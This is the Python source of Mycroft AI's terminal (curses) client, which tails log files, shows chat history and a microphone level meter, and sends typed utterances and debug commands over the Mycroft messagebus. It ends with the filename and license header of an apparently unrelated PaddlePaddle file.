# Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import sys import io import signal from math import ceil from .gui_server import start_qml_gui from mycroft.tts import TTS import os import os.path import time import curses import textwrap import json import mycroft.version from threading import Thread, Lock from mycroft.messagebus.client.ws import WebsocketClient from mycroft.messagebus.message import Message from mycroft.util.log import LOG from mycroft.configuration import Configuration import locale # Curses uses LC_ALL to determine how to display chars set it to system # default locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default preferred_encoding = locale.getpreferredencoding() bSimple = False bus = None # Mycroft messagebus connection config = {} # Will be populated by the Mycroft configuration event_thread = None history = [] chat = [] # chat history, oldest at the lowest index line = "" scr = None log_line_offset = 0 # num lines back in logs to show log_line_lr_scroll = 0 # amount to scroll left/right for long lines longest_visible_line = 0 # for HOME key auto_scroll = True # for debugging odd terminals last_key = "" show_last_key = False show_gui = None # None = not initialized, else True/False gui_text = [] log_lock = Lock() max_log_lines = 5000 mergedLog = [] filteredLog = [] default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon", "DEBUG"] log_filters = list(default_log_filters) log_files = [] find_str = None 
cy_chat_area = 7 # default chat history height (in lines) size_log_area = 0 # max number of visible log lines, calculated during draw # Values used to display the audio meter show_meter = True meter_peak = 20 meter_cur = -1 meter_thresh = -1 SCR_MAIN = 0 SCR_HELP = 1 SCR_SKILLS = 2 screen_mode = SCR_MAIN subscreen = 0 # for help pages, etc. FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw screen_lock = Lock() is_screen_dirty = True # Curses color codes (reassigned at runtime) CLR_HEADING = 0 CLR_FIND = 0 CLR_CHAT_RESP = 0 CLR_CHAT_QUERY = 0 CLR_CMDLINE = 0 CLR_INPUT = 0 CLR_LOG1 = 0 CLR_LOG2 = 0 CLR_LOG_DEBUG = 0 CLR_LOG_ERROR = 0 CLR_LOG_CMDMESSAGE = 0 CLR_METER_CUR = 0 CLR_METER = 0 # Allow Ctrl+C catching... ctrl_c_was_pressed = False def ctrl_c_handler(signum, frame): global ctrl_c_was_pressed ctrl_c_was_pressed = True def ctrl_c_pressed(): global ctrl_c_was_pressed if ctrl_c_was_pressed: ctrl_c_was_pressed = False return True else: return False signal.signal(signal.SIGINT, ctrl_c_handler) ############################################################################## # Helper functions def clamp(n, smallest, largest): """ Force n to be between smallest and largest, inclusive """ return max(smallest, min(n, largest)) def handleNonAscii(text): """ If default locale supports UTF-8 reencode the string otherwise remove the offending characters. """ if preferred_encoding == 'ASCII': return ''.join([i if ord(i) < 128 else ' ' for i in text]) else: return text.encode(preferred_encoding) ############################################################################## # Settings config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf") def load_mycroft_config(bus): """ Load the mycroft config and connect it to updates over the messagebus. 
""" Configuration.init(bus) return Configuration.get() def connect_to_mycroft(): """ Connect to the mycroft messagebus and load and register config on the bus. Sets the bus and config global variables """ global bus global config bus = connect_to_messagebus() config = load_mycroft_config(bus) def load_settings(): global log_filters global cy_chat_area global show_last_key global max_log_lines global show_meter try: with io.open(config_file, 'r') as f: config = json.load(f) if "filters" in config: log_filters = config["filters"] if "cy_chat_area" in config: cy_chat_area = config["cy_chat_area"] if "show_last_key" in config: show_last_key = config["show_last_key"] if "max_log_lines" in config: max_log_lines = config["max_log_lines"] if "show_meter" in config: show_meter = config["show_meter"] except Exception as e: LOG.info("Ignoring failed load of settings file") def save_settings(): config = {} config["filters"] = log_filters config["cy_chat_area"] = cy_chat_area config["show_last_key"] = show_last_key config["max_log_lines"] = max_log_lines config["show_meter"] = show_meter with io.open(config_file, 'w') as f: f.write(str(json.dumps(config, ensure_ascii=False))) ############################################################################## # Log file monitoring class LogMonitorThread(Thread): def __init__(self, filename, logid): global log_files Thread.__init__(self) self.filename = filename self.st_results = os.stat(filename) self.logid = str(logid) log_files.append(filename) def run(self): while True: try: st_results = os.stat(self.filename) # Check if file has been modified since last read if not st_results.st_mtime == self.st_results.st_mtime: self.read_file_from(self.st_results.st_size) self.st_results = st_results set_screen_dirty() except OSError: # ignore any file IO exceptions, just try again pass time.sleep(0.1) def read_file_from(self, bytefrom): global meter_cur global meter_thresh global filteredLog global mergedLog global log_line_offset global 
log_lock with io.open(self.filename) as fh: fh.seek(bytefrom) while True: line = fh.readline() if line == "": break # Allow user to filter log output ignore = False if find_str: if find_str not in line: ignore = True else: for filtered_text in log_filters: if filtered_text in line: ignore = True break with log_lock: if ignore: mergedLog.append(self.logid + line.rstrip()) else: if bSimple: print(line.rstrip()) else: filteredLog.append(self.logid + line.rstrip()) mergedLog.append(self.logid + line.rstrip()) if not auto_scroll: log_line_offset += 1 # Limit log to max_log_lines if len(mergedLog) >= max_log_lines: with log_lock: cToDel = len(mergedLog) - max_log_lines if len(filteredLog) == len(mergedLog): del filteredLog[:cToDel] del mergedLog[:cToDel] # release log_lock before calling to prevent deadlock if len(filteredLog) != len(mergedLog): rebuild_filtered_log() def start_log_monitor(filename): if os.path.isfile(filename): thread = LogMonitorThread(filename, len(log_files)) thread.setDaemon(True) # this thread won't prevent prog from exiting thread.start() class MicMonitorThread(Thread): def __init__(self, filename): Thread.__init__(self) self.filename = filename self.st_results = None def run(self): while True: try: st_results = os.stat(self.filename) if (not self.st_results or not st_results.st_ctime == self.st_results.st_ctime or not st_results.st_mtime == self.st_results.st_mtime): self.read_mic_level() self.st_results = st_results set_screen_dirty() except Exception: # Ignore whatever failure happened and just try again later pass time.sleep(0.2) def read_mic_level(self): global meter_cur global meter_thresh with io.open(self.filename, 'r') as fh: line = fh.readline() # Just adjust meter settings # Ex:Energy: cur=4 thresh=1.5 parts = line.split("=") meter_thresh = float(parts[-1]) meter_cur = float(parts[-2].split(" ")[0]) class ScreenDrawThread(Thread): def __init__(self): Thread.__init__(self) def run(self): global scr global screen_lock global 
is_screen_dirty global log_lock while scr: try: if is_screen_dirty: # Use a lock to prevent screen corruption when drawing # from multiple threads with screen_lock: is_screen_dirty = False if screen_mode == SCR_MAIN: with log_lock: do_draw_main(scr) elif screen_mode == SCR_HELP: do_draw_help(scr) finally: time.sleep(0.01) def start_mic_monitor(filename): if os.path.isfile(filename): thread = MicMonitorThread(filename) thread.setDaemon(True) # this thread won't prevent prog from exiting thread.start() def add_log_message(message): """ Show a message for the user (mixed in the logs) """ global filteredLog global mergedLog global log_line_offset global log_lock with log_lock: message = "@" + message # the first byte is a code filteredLog.append(message) mergedLog.append(message) if log_line_offset != 0: log_line_offset = 0 # scroll so the user can see the message set_screen_dirty() def clear_log(): global filteredLog global mergedLog global log_line_offset global log_lock with log_lock: mergedLog = [] filteredLog = [] log_line_offset = 0 def rebuild_filtered_log(): global filteredLog global mergedLog global log_lock with log_lock: filteredLog = [] for line in mergedLog: # Apply filters ignore = False if find_str and find_str != "": # Searching log if find_str not in line: ignore = True else: # Apply filters for filtered_text in log_filters: if filtered_text and filtered_text in line: ignore = True break if not ignore: filteredLog.append(line) ############################################################################## # Capturing output from Mycroft def handle_speak(event): global chat utterance = event.data.get('utterance') utterance = TTS.remove_ssml(utterance) if bSimple: print(">> " + utterance) else: chat.append(">> " + utterance) set_screen_dirty() def handle_utterance(event): global chat global history utterance = event.data.get('utterances')[0] history.append(utterance) chat.append(utterance) set_screen_dirty() def connect(bus): """ Run the mycroft 
messagebus referenced by bus. Arguments: bus: Mycroft messagebus instance """ bus.run_forever() ############################################################################## # Capturing the messagebus def handle_message(msg): # TODO: Think this thru a little bit -- remove this logging within core? # add_log_message(msg) pass ############################################################################## # "Graphic primitives" def draw(x, y, msg, pad=None, pad_chr=None, clr=None): """Draw a text to the screen Args: x (int): X coordinate (col), 0-based from upper-left y (int): Y coordinate (row), 0-based from upper-left msg (str): string to render to screen pad (bool or int, optional): if int, pads/clips to given length, if True use right edge of the screen. pad_chr (char, optional): pad character, default is space clr (int, optional): curses color, Defaults to CLR_LOG1. """ if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS: return if x + len(msg) > curses.COLS: s = msg[:curses.COLS-x] else: s = msg if pad: ch = pad_chr or " " if pad is True: pad = curses.COLS # pad to edge of screen s += ch * (pad-x-len(msg)) else: # pad to given length (or screen width) if x+pad > curses.COLS: pad = curses.COLS-x s += ch * (pad-len(msg)) if not clr: clr = CLR_LOG1 scr.addstr(y, x, s, clr) ############################################################################## # Screen handling def init_screen(): global CLR_HEADING global CLR_FIND global CLR_CHAT_RESP global CLR_CHAT_QUERY global CLR_CMDLINE global CLR_INPUT global CLR_LOG1 global CLR_LOG2 global CLR_LOG_DEBUG global CLR_LOG_ERROR global CLR_LOG_CMDMESSAGE global CLR_METER_CUR global CLR_METER if curses.has_colors(): curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) bg = curses.COLOR_BLACK for i in range(1, curses.COLORS): curses.init_pair(i + 1, i, bg) # Colors (on black backgound): # 1 = white 5 = dk blue # 2 = dk red 6 = dk purple # 3 = dk green 7 = dk cyan # 4 = dk yellow 8 = lt gray CLR_HEADING = 
curses.color_pair(1) CLR_CHAT_RESP = curses.color_pair(4) CLR_CHAT_QUERY = curses.color_pair(7) CLR_FIND = curses.color_pair(4) CLR_CMDLINE = curses.color_pair(7) CLR_INPUT = curses.color_pair(7) CLR_LOG1 = curses.color_pair(3) CLR_LOG2 = curses.color_pair(6) CLR_LOG_DEBUG = curses.color_pair(4) CLR_LOG_ERROR = curses.color_pair(2) CLR_LOG_CMDMESSAGE = curses.color_pair(2) CLR_METER_CUR = curses.color_pair(2) CLR_METER = curses.color_pair(4) def scroll_log(up, num_lines=None): global log_line_offset # default to a half-page if not num_lines: num_lines = size_log_area // 2 with log_lock: if up: log_line_offset -= num_lines else: log_line_offset += num_lines if log_line_offset > len(filteredLog): log_line_offset = len(filteredLog) - 10 if log_line_offset < 0: log_line_offset = 0 set_screen_dirty() def _do_meter(height): if not show_meter or meter_cur == -1: return # The meter will look something like this: # # 8.4 * # * # -*- 2.4 # * # * # * # Where the left side is the current level and the right side is # the threshold level for 'silence'. global scr global meter_peak if meter_cur > meter_peak: meter_peak = meter_cur + 1 scale = meter_peak if meter_peak > meter_thresh * 3: scale = meter_thresh * 3 h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1) h_thresh = clamp( int((float(meter_thresh) / scale) * height), 0, height - 1) clr = curses.color_pair(4) # dark yellow str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4' str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. 
'3.24' meter_width = len(str_level) + len(str_thresh) + 4 for i in range(0, height): meter = "" if i == h_cur: # current energy level meter = str_level else: meter = " " * len(str_level) if i == h_thresh: # add threshold indicator meter += "--- " else: meter += " " if i == h_thresh: # 'silence' threshold energy level meter += str_thresh # draw the line meter += " " * (meter_width - len(meter)) scr.addstr(curses.LINES - 1 - i, curses.COLS - len(meter) - 1, meter, clr) # draw an asterisk if the audio energy is at this level if i <= h_cur: if meter_cur > meter_thresh: clr_bar = curses.color_pair(3) # dark green for loud else: clr_bar = curses.color_pair(5) # dark blue for 'silent' scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4, "*", clr_bar) def _do_gui(gui_width): clr = curses.color_pair(2) # dark red x = curses.COLS - gui_width y = 3 draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING) cnt = len(gui_text)+1 if cnt > curses.LINES-15: cnt = curses.LINES-15 for i in range(0, cnt): draw(x, y+1+i, " !", clr=CLR_HEADING) if i < len(gui_text): draw(x+2, y+1+i, gui_text[i], pad=gui_width-3) else: draw(x+2, y+1+i, "*"*(gui_width-3)) draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING) draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING) def set_screen_dirty(): global is_screen_dirty global screen_lock with screen_lock: is_screen_dirty = True def do_draw_main(scr): global log_line_offset global longest_visible_line global last_full_redraw global auto_scroll global size_log_area if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY: # Do a full-screen redraw periodically to clear and # noise from non-curses text that get output to the # screen (e.g. 
modules that do a 'print') scr.clear() last_full_redraw = time.time() else: scr.erase() # Display log output at the top cLogs = len(filteredLog) + 1 # +1 for the '--end--' size_log_area = curses.LINES - (cy_chat_area + 5) start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset end = cLogs - log_line_offset if start < 0: end -= start start = 0 if end > cLogs: end = cLogs auto_scroll = (end == cLogs) # adjust the line offset (prevents paging up too far) log_line_offset = cLogs - end # Top header and line counts if find_str: scr.addstr(0, 0, "Search Results: ", CLR_HEADING) scr.addstr(0, 16, find_str, CLR_FIND) scr.addstr(0, 16 + len(find_str), " ctrl+X to end" + " " * (curses.COLS - 31 - 12 - len(find_str)) + str(start) + "-" + str(end) + " of " + str(cLogs), CLR_HEADING) else: scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) + str(start) + "-" + str(end) + " of " + str(cLogs), CLR_HEADING) ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ===" scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING) scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING) y = 2 len_line = 0 for i in range(start, end): if i >= cLogs - 1: log = ' ^--- NEWEST ---^ ' else: log = filteredLog[i] logid = log[0] if len(log) > 25 and log[5] == '-' and log[8] == '-': log = log[27:] # skip logid & date/time at the front of log line else: log = log[1:] # just skip the logid # Categorize log line if " - DEBUG - " in log: log = log.replace("Skills ", "") clr = CLR_LOG_DEBUG elif " - ERROR - " in log: clr = CLR_LOG_ERROR else: if logid == "1": clr = CLR_LOG1 elif logid == "@": clr = CLR_LOG_CMDMESSAGE else: clr = CLR_LOG2 # limit output line to screen width len_line = len(log) if len(log) > curses.COLS: start = len_line - (curses.COLS - 4) - log_line_lr_scroll if start < 0: start = 0 end = start + (curses.COLS - 4) if start == 0: log = log[start:end] + "~~~~" # start.... 
elif end >= len_line - 1: log = "~~~~" + log[start:end] # ....end else: log = "~~" + log[start:end] + "~~" # ..middle.. if len_line > longest_visible_line: longest_visible_line = len_line scr.addstr(y, 0, handleNonAscii(log), clr) y += 1 # Log legend in the lower-right y_log_legend = curses.LINES - (3 + cy_chat_area) scr.addstr(y_log_legend, curses.COLS // 2 + 2, make_titlebar("Log Output Legend", curses.COLS // 2 - 2), CLR_HEADING) scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2, "DEBUG output", CLR_LOG_DEBUG) if len(log_files) > 0: scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2, os.path.basename(log_files[0]) + ", other", CLR_LOG1) if len(log_files) > 1: scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2, os.path.basename(log_files[1]), CLR_LOG2) # Meter y_meter = y_log_legend if show_meter: scr.addstr(y_meter, curses.COLS - 14, " Mic Level ", CLR_HEADING) # History log in the middle y_chat_history = curses.LINES - (3 + cy_chat_area) chat_width = curses.COLS // 2 - 2 chat_out = [] scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width), CLR_HEADING) # Build a nicely wrapped version of the chat log idx_chat = len(chat) - 1 while len(chat_out) < cy_chat_area and idx_chat >= 0: if chat[idx_chat][0] == '>': wrapper = textwrap.TextWrapper(initial_indent="", subsequent_indent=" ", width=chat_width) else: wrapper = textwrap.TextWrapper(width=chat_width) chatlines = wrapper.wrap(chat[idx_chat]) for txt in reversed(chatlines): if len(chat_out) >= cy_chat_area: break chat_out.insert(0, txt) idx_chat -= 1 # Output the chat y = curses.LINES - (2 + cy_chat_area) for txt in chat_out: if txt.startswith(">> ") or txt.startswith(" "): clr = CLR_CHAT_RESP else: clr = CLR_CHAT_QUERY scr.addstr(y, 1, handleNonAscii(txt), clr) y += 1 if show_gui and curses.COLS > 20 and curses.LINES > 20: _do_gui(curses.COLS-20) # Command line at the bottom ln = line if len(line) > 0 and line[0] == ":": scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):", CLR_CMDLINE) 
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE) ln = line[1:] else: prompt = "Input (':' for command, Ctrl+C to quit)" if show_last_key: prompt += " === keycode: "+last_key scr.addstr(curses.LINES - 2, 0, make_titlebar(prompt, curses.COLS - 1), CLR_HEADING) scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING) _do_meter(cy_chat_area + 2) scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT) # Curses doesn't actually update the display until refresh() is called scr.refresh() def make_titlebar(title, bar_length): return title + " " + ("=" * (bar_length - 1 - len(title))) ############################################################################## # Help system help_struct = [ ( 'Log Scrolling shortcuts', [ ("Up / Down / PgUp / PgDn", "scroll thru history"), ("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"), ("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" + "(jump to newest)"), ("Left / Right", "scroll long lines left/right"), ("Home / End", "scroll to start/end of long lines") ] ), ( "Query History shortcuts", [ ("Ctrl+N / Ctrl+Right", "previous query"), ("Ctrl+P / Ctrl+Left", "next query") ] ), ( "General Commands (type ':' to enter command mode)", [ (":quit or :exit", "exit the program"), (":meter (show|hide)", "display the microphone level"), (":keycode (show|hide)", "display typed key codes (mainly debugging)"), (":history (# lines)", "set size of visible history buffer"), (":clear", "flush the logs") ] ), ( "Log Manipulation Commands", [ (":filter 'STR'", "adds a log filter (optional quotes)"), (":filter remove 'STR'", "removes a log filter"), (":filter (clear|reset)", "reset filters"), (":filter (show|list)", "display current filters"), (":find 'STR'", "show logs containing 'str'"), (":log level (DEBUG|INFO|ERROR)", "set logging level"), (":log bus (on|off)", "control logging of messagebus messages") ] ), ( "Skill Debugging Commands", [ (":skills", "list installed skills"), (":activate SKILL", "activate skill, e.g. 
'activate skill-wiki'"), (":deactivate SKILL", "deactivate skill"), (":keep SKILL", "deactivate all skills except " + "the indicated skill") ] ) ] help_longest = 0 for s in help_struct: for ent in s[1]: help_longest = max(help_longest, len(ent[0])) def num_help_pages(): lines = 0 for section in help_struct: lines += 2 + len(section[1]) return ceil(lines / (curses.LINES - 4)) def do_draw_help(scr): def render_header(): scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING) scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING) def render_help(txt, y_pos, i, first_line, last_line, clr): if i >= first_line and i < last_line: scr.addstr(y_pos, 0, txt, clr) y_pos += 1 return y_pos def render_footer(page, total): text = "Page {} of {} [ Any key to continue ]".format(page, total) scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING) scr.erase() render_header() y = 2 page = subscreen + 1 first = subscreen * (curses.LINES - 7) # account for header last = first + (curses.LINES - 7) # account for header/footer i = 0 for section in help_struct: y = render_help(section[0], y, i, first, last, CLR_HEADING) i += 1 y = render_help("=" * (curses.COLS - 1), y, i, first, last, CLR_HEADING) i += 1 for line in section[1]: words = line[1].split() ln = line[0].ljust(help_longest + 1) for w in words: if len(ln) + 1 + len(w) < curses.COLS: ln += " "+w else: y = render_help(ln, y, i, first, last, CLR_CMDLINE) ln = " ".ljust(help_longest + 2) + w y = render_help(ln, y, i, first, last, CLR_CMDLINE) i += 1 y = render_help(" ", y, i, first, last, CLR_CMDLINE) i += 1 if i > last: break render_footer(page, num_help_pages()) # Curses doesn't actually update the display until refresh() is called scr.refresh() def show_help(): global screen_mode global subscreen if screen_mode != SCR_HELP: screen_mode = SCR_HELP subscreen = 0 set_screen_dirty() def show_next_help(): global screen_mode global subscreen if screen_mode == SCR_HELP: subscreen += 1 if subscreen >= 
num_help_pages(): screen_mode = SCR_MAIN set_screen_dirty() ############################################################################## # Skill debugging def show_skills(skills): """ Show list of loaded skills in as many column as necessary """ global scr global screen_mode if not scr: return screen_mode = SCR_SKILLS row = 2 column = 0 def prepare_page(): global scr nonlocal row nonlocal column scr.erase() scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE) scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE) row = 2 column = 0 prepare_page() col_width = 0 skill_names = sorted(skills.keys()) for skill in skill_names: if skills[skill]['active']: color = curses.color_pair(4) else: color = curses.color_pair(2) scr.addstr(row, column, " {}".format(skill), color) row += 1 col_width = max(col_width, len(skill)) if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]: column = 0 scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to continue", CLR_HEADING) scr.refresh() scr.get_wch() # blocks prepare_page() elif row == curses.LINES - 2: # Reached bottom of screen, start at top and move output to a # New column row = 2 column += col_width + 2 col_width = 0 if column > curses.COLS - 20: # End of screen break scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return", CLR_HEADING) scr.refresh() def center(str_len): # generate number of characters needed to center a string # of the given length return " " * ((curses.COLS - str_len) // 2) ############################################################################## # Main UI lopo def _get_cmd_param(cmd, keyword): # Returns parameter to a command. Will de-quote. 
# Ex: find 'abc def' returns: abc def # find abc def returns: abc def if isinstance(keyword, list): for w in keyword: cmd = cmd.replace(w, "").strip() else: cmd = cmd.replace(keyword, "").strip() if not cmd: return None last_char = cmd[-1] if last_char == '"' or last_char == "'": parts = cmd.split(last_char) return parts[-2] else: parts = cmd.split(" ") return parts[-1] def handle_cmd(cmd): global show_meter global screen_mode global log_filters global cy_chat_area global find_str global show_last_key if "show" in cmd and "log" in cmd: pass elif "help" in cmd: show_help() elif "exit" in cmd or "quit" in cmd: return 1 elif "keycode" in cmd: # debugging keyboard if "hide" in cmd or "off" in cmd: show_last_key = False elif "show" in cmd or "on" in cmd: show_last_key = True elif "meter" in cmd: # microphone level meter if "hide" in cmd or "off" in cmd: show_meter = False elif "show" in cmd or "on" in cmd: show_meter = True elif "find" in cmd: find_str = _get_cmd_param(cmd, "find") rebuild_filtered_log() elif "filter" in cmd: if "show" in cmd or "list" in cmd: # display active filters add_log_message("Filters: " + str(log_filters)) return if "reset" in cmd or "clear" in cmd: log_filters = list(default_log_filters) else: # extract last word(s) param = _get_cmd_param(cmd, "filter") if param: if "remove" in cmd and param in log_filters: log_filters.remove(param) else: log_filters.append(param) rebuild_filtered_log() add_log_message("Filters: " + str(log_filters)) elif "clear" in cmd: clear_log() elif "log" in cmd: # Control logging behavior in all Mycroft processes if "level" in cmd: level = _get_cmd_param(cmd, ["log", "level"]) bus.emit(Message("mycroft.debug.log", data={'level': level})) elif "bus" in cmd: state = _get_cmd_param(cmd, ["log", "bus"]).lower() if state in ["on", "true", "yes"]: bus.emit(Message("mycroft.debug.log", data={'bus': True})) elif state in ["off", "false", "no"]: bus.emit(Message("mycroft.debug.log", data={'bus': False})) elif "history" in cmd: # 
extract last word(s) lines = int(_get_cmd_param(cmd, "history")) if not lines or lines < 1: lines = 1 max_chat_area = curses.LINES - 7 if lines > max_chat_area: lines = max_chat_area cy_chat_area = lines elif "skills" in cmd: # List loaded skill message = bus.wait_for_response( Message('skillmanager.list'), reply_type='mycroft.skills.list') if message: show_skills(message.data) scr.get_wch() # blocks screen_mode = SCR_MAIN set_screen_dirty() elif "deactivate" in cmd: skills = cmd.split()[1:] if len(skills) > 0: for s in skills: bus.emit(Message("skillmanager.deactivate", data={'skill': s})) else: add_log_message('Usage :deactivate SKILL [SKILL2] [...]') elif "keep" in cmd: s = cmd.split() if len(s) > 1: bus.emit(Message("skillmanager.keep", data={'skill': s[1]})) else: add_log_message('Usage :keep SKILL') elif "activate" in cmd: skills = cmd.split()[1:] if len(skills) > 0: for s in skills: bus.emit(Message("skillmanager.activate", data={'skill': s})) else: add_log_message('Usage :activate SKILL [SKILL2] [...]') # TODO: More commands return 0 # do nothing upon return def handle_is_connected(msg): add_log_message("Connected to Messagebus!") # start_qml_gui(bus, gui_text) def handle_reconnecting(): add_log_message("Looking for Messagebus websocket...") def gui_main(stdscr): global scr global bus global line global log_line_lr_scroll global longest_visible_line global find_str global last_key global history global screen_lock global show_gui global config scr = stdscr init_screen() scr.keypad(1) scr.notimeout(True) bus.on('speak', handle_speak) bus.on('message', handle_message) bus.on('recognizer_loop:utterance', handle_utterance) bus.on('connected', handle_is_connected) bus.on('reconnecting', handle_reconnecting) add_log_message("Establishing Mycroft Messagebus connection...") gui_thread = ScreenDrawThread() gui_thread.setDaemon(True) # this thread won't prevent prog from exiting gui_thread.start() hist_idx = -1 # index, from the bottom c = 0 try: while True: 
set_screen_dirty() c = 0 code = 0 try: if ctrl_c_pressed(): # User hit Ctrl+C. treat same as Ctrl+X c = 24 else: # Don't block, this allows us to refresh the screen while # waiting on initial messagebus connection, etc scr.timeout(1) c = scr.get_wch() # unicode char or int for special keys if c == -1: continue except curses.error: # This happens in odd cases, such as when you Ctrl+Z # the CLI and then resume. Curses fails on get_wch(). continue if isinstance(c, int): code = c else: code = ord(c) # Convert VT100 ESC codes generated by some terminals if code == 27: # NOTE: Not sure exactly why, but the screen can get corrupted # if we draw to the screen while doing a scr.getch(). So # lock screen updates until the VT100 sequence has been # completely read. with screen_lock: scr.timeout(0) c1 = -1 start = time.time() while c1 == -1: c1 = scr.getch() if time.time()-start > 1: break # 1 second timeout waiting for ESC code c2 = -1 while c2 == -1: c2 = scr.getch() if time.time()-start > 1: # 1 second timeout break # 1 second timeout waiting for ESC code if c1 == 79 and c2 == 120: c = curses.KEY_UP elif c1 == 79 and c2 == 116: c = curses.KEY_LEFT elif c1 == 79 and c2 == 114: c = curses.KEY_DOWN elif c1 == 79 and c2 == 118: c = curses.KEY_RIGHT elif c1 == 79 and c2 == 121: c = curses.KEY_PPAGE # aka PgUp elif c1 == 79 and c2 == 115: c = curses.KEY_NPAGE # aka PgDn elif c1 == 79 and c2 == 119: c = curses.KEY_HOME elif c1 == 79 and c2 == 113: c = curses.KEY_END else: c = c1 if c1 != -1: last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2) code = c else: last_key = "ESC" else: if code < 33: last_key = str(code) else: last_key = str(code) scr.timeout(-1) # resume blocking if code == 27: # Hitting ESC twice clears the entry line hist_idx = -1 line = "" elif c == curses.KEY_RESIZE: # Generated by Curses when window/screen has been resized y, x = scr.getmaxyx() curses.resizeterm(y, x) # resizeterm() causes another curses.KEY_RESIZE, so # we need to capture that to prevent a loop 
of resizes c = scr.get_wch() elif screen_mode == SCR_HELP: # in Help mode, any key goes to next page show_next_help() continue elif c == '\n' or code == 10 or code == 13 or code == 343: # ENTER sends the typed line to be processed by Mycroft if line == "": continue if line[:1] == ":": # Lines typed like ":help" are 'commands' if handle_cmd(line[1:]) == 1: break else: # Treat this as an utterance bus.emit(Message("recognizer_loop:utterance", {'utterances': [line.strip()], 'lang': config.get('lang', 'en-us')})) hist_idx = -1 line = "" elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous) # Move up the history stack hist_idx = clamp(hist_idx + 1, -1, len(history) - 1) if hist_idx >= 0: line = history[len(history) - hist_idx - 1] else: line = "" elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next) # Move down the history stack hist_idx = clamp(hist_idx - 1, -1, len(history) - 1) if hist_idx >= 0: line = history[len(history) - hist_idx - 1] else: line = "" elif c == curses.KEY_LEFT: # scroll long log lines left log_line_lr_scroll += curses.COLS // 4 elif c == curses.KEY_RIGHT: # scroll long log lines right log_line_lr_scroll -= curses.COLS // 4 if log_line_lr_scroll < 0: log_line_lr_scroll = 0 elif c == curses.KEY_HOME: # HOME scrolls log lines all the way to the start log_line_lr_scroll = longest_visible_line elif c == curses.KEY_END: # END scrolls log lines all the way to the end log_line_lr_scroll = 0 elif c == curses.KEY_UP: scroll_log(False, 1) elif c == curses.KEY_DOWN: scroll_log(True, 1) elif c == curses.KEY_NPAGE: # aka PgDn # PgDn to go down a page in the logs scroll_log(True) elif c == curses.KEY_PPAGE: # aka PgUp # PgUp to go up a page in the logs scroll_log(False) elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn scroll_log(True, max_log_lines) elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp scroll_log(False, max_log_lines) elif code == curses.KEY_BACKSPACE or code == 127: # Backspace to erase a character in the utterance line = 
line[:-1] elif code == 6: # Ctrl+F (Find) line = ":find " elif code == 7: # Ctrl+G (start GUI) if show_gui is None: start_qml_gui(bus, gui_text) show_gui = not show_gui elif code == 18: # Ctrl+R (Redraw) scr.erase() elif code == 24: # Ctrl+X (Exit) if find_str: # End the find session find_str = None rebuild_filtered_log() elif line.startswith(":"): # cancel command mode line = "" else: # exit CLI break elif code > 31 and isinstance(c, str): # Accept typed character in the utterance line += c finally: scr.erase() scr.refresh() scr = None def simple_cli(): global bSimple bSimple = True bus.on('speak', handle_speak) try: while True: # Sleep for a while so all the output that results # from the previous command finishes before we print. time.sleep(1.5) print("Input (Ctrl+C to quit):") line = sys.stdin.readline() bus.emit(Message("recognizer_loop:utterance", {'utterances': [line.strip()]})) except KeyboardInterrupt as e: # User hit Ctrl+C to quit print("") except KeyboardInterrupt as e: LOG.exception(e) event_thread.exit() sys.exit() def connect_to_messagebus(): """ Connect to the mycroft messagebus and launch a thread handling the connection. Returns: WebsocketClient """ bus = WebsocketClient() # Mycroft messagebus connection event_thread = Thread(target=connect, args=[bus]) event_thread.setDaemon(True) event_thread.start() return bus
serve.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
